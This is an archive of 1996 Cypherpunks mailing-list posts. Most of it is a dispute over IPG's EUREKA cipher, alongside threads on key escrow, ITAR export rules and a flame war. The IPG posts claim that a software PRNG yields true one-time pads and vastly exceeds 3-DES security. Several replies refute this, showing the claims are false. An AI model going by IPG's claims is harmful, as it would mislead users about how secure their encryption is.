         patently impossible.. One of your Cpunk colleagues says he
         uses Triple DES, 168 bits, and he does not believe that it
         can be brute forced - I agree, 3-DES, 10^50+ possibilities,
         cannot be brute forced now, or in the foreseeable future -
         then what about the EUREKA's 10^34322 possibilities,
         10^34271+ greater than 3-DES? No way, not now, not ever.
         Furthermore, EUREKA is an order, or more, magnitude faster
         than triple DES, easier to use, much more secure, etal.

         Another has suggested that if the key, and all the variables
         are hacked, then the system can be compromised. That is true,
         but again excuse me, does not that apply to any system,
         whether it be RSA, PGP, IDEA, and yes also a hardware sourced
         OTP.  EUREKA's only edge in that regard is that built in
         means that facilitate safeguards which minimize such risks.

         EUREKA is not a panacea for all your encryption needs.  RSA,
         PGP, ENTRUST, and other systems fill very important
         exigencies. Where EUREKA shines brightest is in two important
         strategic user applications:

            1. To set up a permanent line of Internet/intranet
               communication privacy between two, or a group of,
               individuals. As a result, pass phrases, session
               encryption keys, and other work impediments of that
               genre can be largely eliminated.

               While applicable to everyone, this is especially true
               of newbies, computer novices, technophobes, and other
               non-techies.

               It is much faster, easier to use, and more flexible
               than other systems for this application. As such, it is
               ideal for intranets, or mixed Internet/intranet
               systems.

            2. To protect your private hard disk files, programs or
               data, from compromise by hackers and interlopers. In
               this application it is unsurpassed because differential
               analysis of changing files is rendered impossible and
               it is extremely fast.



         See for yourself. Prove it to yourself, Q.E.D. The IPG
         algorithm is available at:

                   http://netprivacy.com/algo.html

                     or a condensed version at:

                   http://netprivacy.com/condalgo.html


         P.S. My resume can also be found there

                   http://www.netprivacy.com/resume.html 



> ==================================================================
>
>                   Donald R. Wood
>                   ipgsales@cyberstation.net
>==================================================================== 
>
> Some p[eople are more certain of their own opinions than they are of
> facts presented by those they disagree with - Aristotle
>
> ----------------------  Quod Erat Demonstrandum ----------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Wed, 16 Oct 1996 19:22:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CyberPromo sparks a new list
Message-ID: <1iDeZDvcwapi@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

There seems to be some interest, so I've started a list to discuss the
CyberPromo ongoing abuse.  The list is a simple exploder located at
mail-abuse@scytale.com.  For the present, I'm handling the list
manually, so add/delete requests should be sent to me, roy@scytale.com.
Personal referrals are welcome, but please don't publicize the list
generally.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmWUABvikii9febJAQEPhQQAmMcPvTtAOptXvUbojCXpzWcupniPN+//
z6W0/TEBPG5hvA42NiYXOUgvp2ESuKux1uOZfHp5jQb+FnZP6ac38e6mNQ9LxXAA
2iDA3NB2ZopfreIcnAzUt0uzXyQBUaZ1B/LTfyzs6u89nvTqg2cEcUfMm1MI4zDM
wGh1KR0kXA4=
=RsGr
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 16 Oct 1996 21:10:41 -0700 (PDT)
To: IPG Sales <coderpunks@toad.com
Subject: Re: Q.E.D.
Message-ID: <199610170408.VAA25528@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:28 PM 10/16/96 -0500, IPG Sales wrote (original at excessive length):
>         ...  IPG has produced a system to generate software OTPs,
>         albeit it within limited but but more than ample entropy, not
>         software random numbers.
>
>         We stipulate the obvious fact that the encryptor stream
>         generated by EUREKA is a PRNG stream, though we do consider
>         it gross denigration to castigate it as ONLY a PRNG stream.
>         It is a PRNG issue that also happens to be an extremely well
>         behaved OTP sequence, with limited but ample entropy, as well.

The problem is you are misusing the term One Time Pad.

>         It meets each and every criteria rationally established for an
>         OTP in all reasonable aspects.

One of the criteria for a OTP is that you can credibly claim that ANY plain
text (of the correct length) is a valid decryption of a cyphertext
encrypted with a OTP.  Since your PRNG has less entropy than the message,
there are output sequences that can not occur.  Therefore there are
plaintext messages which have no possible key.  These messages are not
credible decryptions and the PRNG is not a OTP.  This criterion is directly
related to the provable security of the OTP.  As such it is certainly a
rationally established criterion.

Now your PRNG may be a reasonably secure cypher system.  (I haven't looked
at it.)  However it isn't an OTP and should not be advertised as such. 
Doing so makes people familar with the field think you don't know what you
are talking about.


-------------------------------------------------------------------------
Bill Frantz       | Tired of Dole/Clinton?     | Periwinkle -- Consulting
(408)356-8506     | Vote 3rd party.  I'm       | 16345 Englewood Ave.
frantz@netcom.com | Voting for Harry Browne    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypher@cyberstation.net
Date: Wed, 16 Oct 1996 19:26:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Q.E.D.
Message-ID: <Pine.BSI.3.95.961016211701.25964A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain



         Some of you have sardonically written to say "Nihil Est
         Demonstrandum," N.E.D. because an OTP must be derived from a
         hardware source, that is, it must be a pure random sequence
         of limitless entropy. Accordingly, they unbashfully assert
         that an OTP generated by a computer program is not possible.

         How do they know that? Does the Bible tell them so, or the
         Koran, or do they get it from the Torah? Why not cite the
         source of their certainty instead of advancing an unsupported
         proposition.  I do not mean to be rude, but excuse me, what
         scientific proof can they offer for that immovable avowal?
         There is no scientific proof whatsoever, none at all, except
         for the words and their steadfast, and maybe self serving,
         postulate.  Accordingly, obviously it is they, not us, who are
         the ones that have "Nihil Est Demonstrandum," in this matter.
         There is not one scintilla of sustainable evidence to support
         such a doctrine.

         While the vast majority of people knowledgeable about
         cryptography have not heretofore believed that it is possible
         for software to produce an OTP, that does not make it a
         scientific fact, but merely means it is the consensus of
         scientific opinion that it is not possible. With all due
         respect to Bruce, and his exceptional work, Paul, Roy and many 
         others who obviously know the subject matter of which we speak, I
         offer that  history is replete with scientists supplying proof of
         the seemingly impossible.

         In support of their position, some have pointed out that John
         von Neumann, to paraphrase, stated that ARITHMETIC cannot
         produce random numbers, a thesis which I agree with; but
         where is that, in any way inconsistent with IPG's position on
         EUREKA?  IPG has produced a system to generate software OTPs,
         albeit it within limited but more than ample entropy, not
         software random numbers.

         We stipulate the obvious fact that the encryptor stream
         generated by EUREKA is a PRNG stream, though we do consider
         it gross denigration to castigate it as ONLY a PRNG stream.
         It is a PRNG issue that also happens to be an extremely well
         behaved OTP sequence, with limited but ample entropy, as well.
         It meets each and every criteria rationally established for an
         OTP in all reasonable aspects. Subjected to any and all
         statistical analyses, the EUREKA PRNG stream manifests itself as
         being random, though we know, as a scientific fact, that it is
         not.

         To substantiate that posit, and unlike the consensus of
         scientific opinion, obviously N.E.D., that believes that
         software cannot produce an OTP, IPG offers "Quod Erat
         Demonstrandum," Q.E.D. scientific proof that we can produce
         a humungous number of software OTPs sufficient to meet any and
         all current or future requirements.

         You do not need to be an Einstein, a Hawking, or a von
         Neumann, to understand the fundamental basis of the IPG
         EUREKA algorithm. Succinctly as I can , that is, given a truly
         random key of entropy N, and possibly truly random look up tables
         of combined entropy M, it is possible to generate up to N
         streams of characters of a length in this case of
         approximately 10^223, that manifest themselves as true OTPs.

         Think about that simple supposition for a moment. What do we
         mean by an OTP? We mean that an OTP is a stream of
         characters, or numbers, that cannot be derived in the
         absence of the key that was used to generate them, or
         alternately by trying all possibilities of that said key.
         Thus, when using the resultant as an encryptor stream, the
         only information derivable from the ciphertext is the
         determination of the maximum possible length. Furthermore,
         by using the exclusionary proof, you cannot preclude any
         possible message of that said length.

         If you think through that hypothesis, it becomes clear that
         such is not precluded by von Neumann's proffer, or by
         fundamental mathematical principles. The question then, is
         how can you go about doing that? That is all that IPG has
         done.  We have figured out a mathematical certain way, (
         Q.E.D.), of generating N number, or rather a number very
         close to N, of OTPs from a given key of entropy N, and we can
         prove it.

         Not only that, but you can prove it to yourself, Q.E.D.  We
         maintain that it is discernible to any knowledgeable person
         who probes the algorithm, that the only analytical tack that
         can be mounted against EUREKA is brute force and that is
         patently impossible. One of your Cpunk colleagues says he
         uses Triple DES, 168 bits, and he does not believe that it
         can be brute forced - I agree, 3-DES, 10^50+ possibilities,
         cannot be brute forced now, or in the foreseeable future -
         then what about the EUREKA's 10^34322 possibilities,
         10^34271+ greater than 3-DES? No way, not now, not ever.
         Furthermore, EUREKA is an order, or more, magnitude faster
         than triple DES, easier to use, much more secure, etal.

         Another has suggested that if the key, and all the variables
         are hacked, then the system can be compromised. That is true,
         but again excuse me, does not that apply to any system,
         whether it be RSA, PGP, IDEA, and yes also a hardware sourced
         OTP.  EUREKA's only edge in that regard is that built in
         means that facilitate safeguards which minimize such risks.

         EUREKA is not a panacea for all your encryption needs.  RSA,
         PGP, ENTRUST, and other systems fill very important
         exigencies. Where EUREKA shines brightest is in two important
         strategic user applications:

            1. To set up a permanent line of Internet/intranet
               communication privacy between two, or a group of,
               individuals. As a result, pass phrases, session
               encryption keys, and other work impediments of that
               genre can be largely eliminated.

               While applicable to everyone, this is especially true
               of newbies, computer novices, technophobes, and other
               non-techies.

               It is much faster, easier to use, and more flexible
               than other systems for this application. As such, it is
               ideal for intranets, or mixed Internet/intranet
               systems.

            2. To protect your private hard disk files, programs or
               data, from compromise by hackers and interlopers. In
               this application it is unsurpassed because differential
               analysis of changing files is rendered impossible and
               it is extremely fast.



         See for yourself. Prove it to yourself, Q.E.D. The IPG
         algorithm is available at:

                   http://netprivacy.com/algo.html

                     or a condensed version at:

                   http://netprivacy.com/condalgo.html


         P.S. My resume can also be found there

                   http://www.netprivacy.com/resume.html

P.S. Have any of you received the long:

 Phoenix arisen from the ashes 

posting that we made on 10-06-96 weird things are happening.



> ==================================================================
>
>                   Donald R. Wood
>                   ipgsales@cyberstation.net
>==================================================================== 
>
> Some people are more certain of their own opinions than they are of
> facts presented by those they disagree with - Aristotle
>
> ----------------------  Quod Erat Demonstrandum ----------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Wed, 16 Oct 1996 21:40:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NOISE] White house docs
Message-ID: <v03007807ae8b63437b60@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


Just for fun:

 go to <http://www.whitehouse.gov>, go into the library, and ask to search everything.
Search for "key recovery". Here's a partial list of what you get:



------------------------------------------------------------------------
Public Press Releases

October 6, 1996
HARTFORD DEBATE '96: THE FIRST PRESIDENTIAL DEBATE BETWEEN PRESIDENT 
CLINTON AND SENATOR DOLE 

------------------------------------------------------------------------
White House Website

Franklin D. Roosevelt 
...recovery ... 
http://www.whitehouse.gov/WH/glimpse/presidents/html/fr32.html 

Franklin D. Roosevelt [Text Version]
...recovery ... 
http://www.whitehouse.gov/WH/glimpse/presidents/html/fr32-plain.html 

Making West Virginia a Better Place to Live and Work 
...Key Industries. After a decade of enormous job losses ... 
http://www.whitehouse.gov/WH/Accomplishments/states/html/wv.html 

Making Hawaii a Better Place to Live and Work 
...Key Industries. After a decade of enormous job losses ... 
http://www.whitehouse.gov/WH/Accomplishments/states/html/hw.html 

Making Oregon a Better Place to Live and Work 
...Key Industries. After a decade of enormous job losses ... 
http://www.whitehouse.gov/WH/Accomplishments/states/html/or.html 

Making Montana a Better Place to Live and Work 
...Key Industries. After a decade of enormous job losses ... 
http://www.whitehouse.gov/WH/Accomplishments/states/html/mt.html 

and on for the rest of the 50 states.
These web pages are all (ok, I looked at a few, not all) titled: "Making XXX a Better Place to Live and Work" and subtitled: "America Is Moving In the Right Direction Under President Clinton"

So I compared the "accomplishments" for Oregon and Montana. Discounting all the places where the name of the state was the only thing changed, I was left with:

Oregon:
*Unemployment Rate in Oregon Has Declined from 8.0% to 4.7%. 
*Consumer Confidence Is Up 43%, After Dropping During the Prior Four 
*155,000 New Jobs in 33 Months -- More than the Entire Previous 
*145,323 Working Families Receive a Tax Cut. The President's expanded 
*332 New Police Officers in Oregon. The President's Crime Bill puts 332 
*431,000 Workers Protected by Family and Medical Leave. The Family and 

Montana:
*Unemployment Rate in Montana Has Declined from 6.6% to 5.9%.
*Consumer Confidence Is Up 71%, After Dropping During the Prior Four 
*39,200 New Jobs in 33 Months -- More than the Entire Previous 
*47,638 Working Families Receive a Tax Cut. The President's expanded 
*120 New Police Officers in Montana. The President's Crime Bill puts 120 
*76,000 Workers Protected by Family and Medical Leave. The Family and 


-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"We're not gonna take it/Never did and never will
We're not gonna take it/Gonna break it, gonna shake it,
let's forget it better still" -- The Who, "Tommy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 16 Oct 1996 20:25:38 -0700 (PDT)
To: douzzer@MIT.EDU
Subject: Re: AW: Binding cryptography - a fraud-detectible alternative to key-escrow
In-Reply-To: <199610161120.EAA11108@lechter.chautauqua.com>
Message-ID: <199610170239.VAA00204@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


> oh pooh, you've seen this material run through over and over.
> perhaps you respect my "opinion" because you know i am right. i know i
> don't respect your position, because i am irrevocably convinced that
> you are wrong.

     Well, I guess that by the above paragraph, I am perfectly just in 
calling you a nearsighted fool? 

> acceptable:
> 
> -tracking of all chemicals which have been or can be manufactured into
>   poisons, explosives, or psychoactives (cannot buy or sell
>   anonymously)

     <BZZZZT> thanks for playing. Nearly _all_ chemicals can be manufactured
into poisons, not to mention explosives. You wanna register your bottle
of bleach with the feds? I can make a mustard gas clone out of it. You wanna
register your bag of sugar? There are explosives that can be made out of it.

     Hell, **OXYGEN** is toxic in high concentrations. You wanna track THAT?

     Life is %100 fatal. You can't change that.

> -tracking of all automobiles and deadly weapons

     Why? What percentage of murders are _solved_ because the police find 
the murder weapon, and use THAT to track it back to the killer? I'd bet that
it is an insignificant percentage (first person who points out a single case
gets the twit award--a free copy of GNU emacs source code mailed to your email
address--I KNOW it happens, but is it statistically common? No.) 

     And why track autos? Nosy little feds wanna know where I am? 


> unacceptable:
> -restrictions on what i can think, who i can speak to, what i can say,
>   and how i say it, aside from shouting lies in a crowded movie
>   theater or other such crowded public place.

     But by saying MEAN THINGS, you are hurting people, and that is wrong. 

> -restrictions on how i can defend myself when my life is threatened

     Defending yourself isn't necessary, We, the government will do that 
for you. 

> -prohibitions on drug purchase, sale, or use

     Tracking chemicals...

> i'm not ever going to change my position on this. you can drive bamboo
> shoots under my fingernails and toenails, you can megadose me on LSD,

     Sounds like one of these has happened already, and I don't hear you
screaming...

> you can pull my teeth and administer electric shocks to my testicles,
> and i am still going to believe that absolute information privacy, and
> absolute freedom of thought and conversation, are inalienable human
> rights.

     1) Torture doesn't change someones mind. There are other means of 
doing that. 

     2) Very unimaginative. 

> if what you want to stop is airplane explosions, landmines, poisoned
> water supplies, and mailbombs, please PLEASE make it your personal
> mission to see that chemicals are more tightly controlled, airports
> have the latest and greatest nuclear resonance tomographic imagers,
> landmines aren't manufactured or sold any longer, water supplies are
> tested around the clock using the latest technology, and everyone
> knows not to open unsolicited packages.

     Or just make it unnecessary to carry out terrorist acts. 

> i don't trust my government. i don't trust ANY government. government
> is that segment of society that arrogates a monopoly on "legitimate
> violence." it is composed of powergrabbers, and ass-kissers with
> sinecures, who are paid with stolen money, some of it stolen from me.

     You don't trust _any_ government, yet you want them to track _every_
chemical that people purchase? 

     There is crypto relevance in there somewhere I think...

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Wed, 16 Oct 1996 21:40:22 -0700 (PDT)
To: jim bell <stan_gibson@zd.com
Subject: Re: Your editorial in the 10/14 PCWeek
In-Reply-To: <199610170312.UAA03693@mail.pacifier.com>
Message-ID: <v03007806ae8b5d3d10dd@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


At 03:37 PM 10/16/96 -0800, Timothy C. May wrote:
>I wrote:
>>A) This is not a change in the law. There is no law regarding export of
>>encryption software.
>>Congress has never passed any such law. These are State Department
>>regulations and presidential decrees. These regulations, which have the
>>force of law to you and me, were never debated or voted upon by our
>>elected representatives. They can be changed tomorrow the same way. In
>>fact, they can be changed and the public need not even be notified.
>
>Actually, as Greg Broiles pointed out in an article (on the Cypherpunks
>list) several weeks ago, Congress deliberately chooses to delegate much
>regulatory authority to other agencies. There just is not enough time or
>expertise for them to pass specific laws covering the number and size of
>trashcans in the national parks, the type of equipment to be used on Navy
>ships, and so on. The State Department--and soon to be transferred to
>Commerce--has the regulatory authority to decide which exports are covered
>by the International Trafficking in Arms Regulations, the ITARs. These
>rules effectively have the full force of law, as many tens of thousands of
>laws not specifically passed by Congress have.
>
I never argued that these regulations did not have the force of law.
In fact, I conceded that they did.

Nevertheless, they are not laws.
They were neither debated nor voted upon by our elected representatives.
They can be changed at a moment's notice by the State Department, which takes its' orders from the President. The announcement that prompted Mr. Gibson's editorial did not come from the State Department, who putatively has authority over the ITAR.  Instead, the announcement was made from the office of the Vice President, and begins "President Clinton and I" and speaks throughout of "The Administration's initiative".

_That_ was the distinction that I was making.

FWIW, I was unable to find the announcement on the White House's web server, but it is availiable at <http://www.epic.org/crypto/key_escrow/clipper4_statement.html>


Here is another example (taken from the Clipper debate):

In a paper about privacy and the original Clipper proposal (in 1994) A. Michael Froomkin of the University of Miami School of Law pointed out that since the entire key-escrow infastructure was created by presidential decree, and the proposed key holders were part of the executive branch, the provisions for release of the keys could be changed at a moment's notice by another presidential decree, which need not ever be made public. [ Yo, key escrow dude! Email your key database to wiretappers@fbi.gov, and don't tell anyone! ]

See <http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/partIC.html#ToC29> for the following quote, and <http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html> for the entire paper. (It's very long; but suprisingly readable, given that the author is a law professor ;-)

>The security precautions introduced by NIST in late 1994 are complex. To the nonspecialist they
>appear sufficient to prevent security breaches at the time the keys are "burned in" and to prevent
>surreptitious copying or theft of the key list from the escrow agents. But no amount of technical
>ingenuity will suffice to protect the key fragments from a change in the legal rules governing the
>escrow agents. Thus, even if the technical procedures are sound, the President could direct the
>Attorney General to change her rules regarding the escrow procedures. Because these rules were
>issued without notice or comment, affect no private rights, and (like all procedural rules) can
>therefore be amended or rescinded at any time without public notice, there is no legal obstacle to
>a secret amendment or supplement to the existing rules permitting or requiring that the keys be
>released to whomever, or according to whatever, the President directs. Because the President's
>order would be lawful, none of the security precautions outlined by NIST would protect the
>users of the EES system from disclosure of the key segments by the escrow agents. 

I

 -- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"The Singapore government isn't interested in controlling information, but wants a gradual phase-in of services to protect ourselves. It's not to control, but to protect the citizens of Singapore. In our society, you can state your views, but they have to be correct."
- Ernie Hai, coordinator of the Singapore Government Internet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 16 Oct 1996 20:11:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [TIMMY MAY] Timmy May doesn't like being exposed as a liar
In-Reply-To: <199610161113.HAA187758@osceola.gate.net>
Message-ID: <mL8wVD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


More spam from FOTM (friends of Timmy May):

>Received: from miafl2-16.gate.net (miafl2-16.gate.net [199.227.2.143]) by osceola.gate.net (8.7.6/8.6.12) with SMTP id HAA187758; Wed, 16 Oct 1996 07:13:05 -0400
>Date: Wed, 16 Oct 1996 07:13:05 -0400
>Message-Id: <199610161113.HAA187758@osceola.gate.net>
>From: Jim Ray <liberty@gate.net>
>To: root@bwalk.dm.com, postmaster@bwalk.dm.com
>X-Priority: Normal
>Subject: Dr.Dimitri Vulis KOTM
>X-Mailer: Pronto Secure [Ver 1.10]
>X-Prontosecureinfo:  T=signed, P=x-pgp
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Mime-Version: 1.0
>Content-Type: text/plain
>Content-Transfer-Encoding: 7bit
>
>To: root@bwalk.dm.com, postmaster@bwalk.dm.com
>Date: Wed Oct 16 07:10:45 1996
>Can you folks somehow get Dr.Dimitri Vulis KOTM <dlv@bwalk.dm.com> to quit
>sending anonymous messages to cypherpunks? I have killfiled him, but he
>sends things with subject headers like "RSA" through the anonymous remailers
>and it is impossible to killfile them and still get interesting anonymous
>messages.
>
>He is evidently angry at another subscriber, Tim May, for showing the list
>how much of a fool he was regarding economics in the past, but now he shows
>how much of a fool he is. Below is an example, the subject was RSA, and it
>could only have come from him, I assure you. [BTW, this is not a threat of
>legal action on my part against you, it's just that you are lowering your
>reputations by letting him continue spewing garbage, and now that even
>killfiling him hasn't worked, I am trying to convince you to talk to him and
>encourage him to please take his lithium regularly.]
>JMR
>
>- -----Begin Included Message -----
>
>Date: Tue, 15 Oct 1996 15:35:04 -0400 (EDT)
> From: amnesia@chardos.connix.com (Anonymous)
>To: cypherpunks@toad.com
>Cc:
>
>Timmy C. Mayflower was born when his mother was on the
>toilet.
>
>
>
>- ---- End of forwarded message ----
>One of the "legitimate concerns of law enforcement" seems to be
>that I was born innocent until proven guilty and not the other
>way around. -- me
>
>Defeat the Duopoly! Vote Harry & Jo http://www.HarryBrowne96.org/
>___________________________________________________________________
>PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
>I will generate a new (and bigger) PGP key-pair on election night.
><mailto:jmr@shopmiami.com> http://www.shopmiami.com/prs/jimray
>___________________________________________________________________
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQCVAwUBMmTCum1lp8bpvW01AQHAugP/e/GTay0y778Ziy3JbWCGBb+tRxM8Q1Zi
>Z3aIP97hNYYoD7QKi9yP1gS3ZRbg/9ZXJonWTi+zmZ7yUjmWndczmXJ2IAC+Rgpx
>7MQmrhjU4htmiMCuawNmVLZRNZMl/+kNnX15taA8GdXTcuPXUsGN0y39oMbbqT5g
>do3B4yicgrY=
>=iix/
>-----END PGP SIGNATURE-----
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Wed, 16 Oct 1996 22:18:13 -0700 (PDT)
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Q.E.D.
In-Reply-To: <Pine.BSI.3.95.961016194535.21030B-100000@citrine.cyberstation.net>
Message-ID: <Pine.BSF.3.91.961016202322.466A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> hardware source, that is, it must be a pure random sequence
> of limitless entropy. Accordingly, they unbashfully assert
> that an OTP generated by a computer program is not possible.
> How do they know that? Does the Bible tell them so, or the
> Koran, or do they get it from the Torah? Why not cite the

No, not the Bible, or the Koran, or the Torah. Try information theory. 

> We stipulate the obvious fact that the encryptor stream
> generated by EUREKA is a PRNG stream, though we do consider
> it gross denigration to castigate it as ONLY a PRNG stream.
> It is a PRNG issue that also happens to be an extremely well
> behaved OTP sequence, with limited but ample entropy, as well.
> It meets each and every criteria rationally established for an
> OTP in all reasonable aspects. Subjected to any and all
> statistical analyses, the EUREKA PRNG stream manifests itself as
> being random, though we know, as a scientific fact, that it is
> not.

A PRNG is not a OTP.

A PRNG, like all cryptography (except the OTP) can be broken. Some
cryptography can be broken by cryptanalytic "shortcuts". _All_ ciphers can
be broken by brute force. If it is a strong cipher, there are no known
shortcuts, and the keysize is great enough that brute force is infeasable. 

A stream cipher operating in OFB mode _seems_ a lot like a one-time pad. 
With the stream cipher, you XOR the output of the PRNG with the plaintext,
which produces the ciphertext. With a OTP, it's the same, except you use a
true RNG instead of a PRNG. 

Implementation-wise, they seem almost identical, the only real difference 
being that key management with the stream cipher is a lot easier. 

Cryptanalysis-wise there is a _very_ big difference. 

> Think about that simple supposition for a moment. What do we
> mean by an OTP? We mean that an OTP is a stream of
> characters, or numbers, that cannot be derived in the
> absence of the key that was used to generate them, or
> alternately by trying all possibilities of that said key.
[snip]
> Another has suggested that if the key, and all the variables
> are hacked, then the system can be compromised. That is true,
> but again excuse me, does not that apply to any system,
> whether it be RSA, PGP, IDEA, and yes also a hardware sourced
> OTP.

No. Here we get to the difference between a OTP and a regular cipher: 

A OTP doesn't have a key, just a truely random stream.
A OTP is very difficult to use, because of the size of the random stream.
A OTP can't be broken AT ALL, not even by brute force.
A OTP is information theoritically secure.

A cipher has a key that produces a pseudo-random stream.
A cipher is not hard to use, because the key is relatively short. 
A good cipher can be broken by brute force, but the attack isn't practical. 
A good cipher is cryptographically secure.

Here's an example of a OTP...

----- From Applied Cryptography 2nd edition, pages 15-16 ----
If the message is
 ONETIMEPAD 
and the key sequence from the pad is 
 TBFRGFARFM 
then the ciphertext is
 IPKLPSFHGO
because
 O + T mod 26 = I
 N + B mod 26 = P
 E + F mod 26 = K
 etc.

Assuming an evesdropper can't get access to the one-time pad used to 
encrypt the message, this scheme is perfectly secure. A given ciphertext 
message is equally likely to correspond to any possible plaintext message 
of equal size.
Since every key sequence is equally likely (remember, the key letters are 
generated randomly), an adversary has no information with which to 
cryptanalyze the ciphertext. The key sequence could just as likely be:
 POYYAEAAZX
which would decrypt to:
 SALMONEGGS
or
 BXFGBMTMXM
which would decrypt to:
 GREENFLUID

This point bears repeating: Since every plaintext message is equally 
possible, there is no way for the cryptanalyst to determine which 
plaintext message is the correct one. A random key sequence added to a 
nonrandom plaintext message produced a completely random ciphertext 
message and no amount of computing power can challenge that.
----- End of excerpt -----

With a PRNG there are a limited number of outputs, so there might not be
any key to produce POYYAEAAZX or BXFGBMTMXM, and so by brute-force an
attacker may determine that the plaintext is not SALMONEGGS or GREENFLUID
or whatever else. With enough PRNG-encrypted ciphertext, it is possible to
rule out all but one possible plaintext. This is how a brute-force attack
works. With a OTP, brute-force won't work, because no plaintexts can be
ruled out. 

I took a quick look at the algorithm on your web page, and it is
definately a PRNG.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fred Goldberg <goldberg@mars.superlink.net>
Date: Wed, 16 Oct 1996 19:24:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Re: SPA's Press Release
Message-ID: <3.0b15.32.19961016222101.00b10588@mars.superlink.net>
MIME-Version: 1.0
Content-Type: text/enriched

At 05:10 PM 10/16/96 -0500, Sean Sutherland stood upon his soapbox and declaimed:
>Their term, "contributory 
>infringement" is almost like suing the bartender because a customer got into a 
>wreck while drunk.

Right or wrong, in some states, at least, you can not only sue a professional bartender, you can sue any individual who serves liquor at a private party and allows a guest to drive home under the influence, if the guest causes damage to you or your property as a result.  Many people support this "vicarious liability" theory as it relates to drunk driving.

Next time, pick a better analogy.  You may have just given their lawyers the analogy they need to prove their case.


Fred Goldberg           WA2BJZ         EMT-D


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 16 Oct 1996 19:40:25 -0700 (PDT)
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Q.E.D.
In-Reply-To: <Pine.BSI.3.95.961016194535.21030B-100000@citrine.cyberstation.net>
Message-ID: <199610170240.WAA01645@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



[I'm not on cypherpunks, so I won't see replies sent only to there. I
have bcc'ed coderpunks to prevent replies from being sent there accidently.]

IPG Sales writes:
>          Some of you have sardonically written to say "Nihil Est
>          Demonstrandum," N.E.D. because an OTP must be derived from a
>          hardware source, that is, it must be a pure random sequence
>          of limitless entropy. Accordingly, they unbashfully assert
>          that an OTP generated by a computer program is not possible.
> 
>          How do they know that? Does the Bible tell them so, or the
>          Koran, or do they get it from the Torah? Why not cite the
>          source of their certainty instead of advancing an unsupported
>          proposition.

See Claude Shannon's papers on information theory. [Available as: C.E.
Shannon, Collected Papers: Claude Elmwood Shannon, N.J.A. Sloane and
A.D. Wyner, eds., New York: IEEE Press, 1993.]

Shannon invented information theory in 1948 and 1949. Part of his
papers discuss the information theory of cryptosystems. He
mathematically proved that only a O.T.P. using non-reused physically
random numbers could provide what he termed "perfect secrecy".  I
accept mathematical proofs above the Koran or the Bible. (The Torah is
a subset of the Bible.)

>          I do not mean to be rude,

You are anyway.

>          but excuse me, what
>          scientific proof can they offer for that immovable avowal?

See above.

>          There is no scientific proof whatsoever, none at all,

See above.

>          except
>          for the words and their steadfast, and maybe self serving,
>          postulate.

See avove.

>          Accordingly, obviously it is they, not us, who are
>          the ones that have "Nihil Est Demonstrandum," in this matter.

See above.

>          There is not one scintilla of sustainable evidence to support
>          such a doctrine.

See above.

>          While the vast majority of people knowledgeable about
>          cryptography have not heretofore believed that it is possible
>          for software to produce an OTP,

It is not possible.

The information content, or entropy, of the key stream is necessarily
no larger than its keyspace. That is, if you have a software
pseudo-random number generator using an N bit seed, the entropy of the
keyspace is necessarily never greater than N. This is mathematically
certain -- no amount of prayer on your part can change that.

>          that does not make it a
>          scientific fact,

Sorry, its even better -- a MATHEMATICAL fact.

>          In support of their position, some have pointed out that John
>          von Neumann, to paraphrase, stated that ARITHMETIC cannot
>          produce random numbers,

von Neumann meant any deterministic algorithm, actually.

>          We stipulate the obvious fact that the encryptor stream
>          generated by EUREKA is a PRNG stream, though we do consider
>          it gross denigration to castigate it as ONLY a PRNG stream.

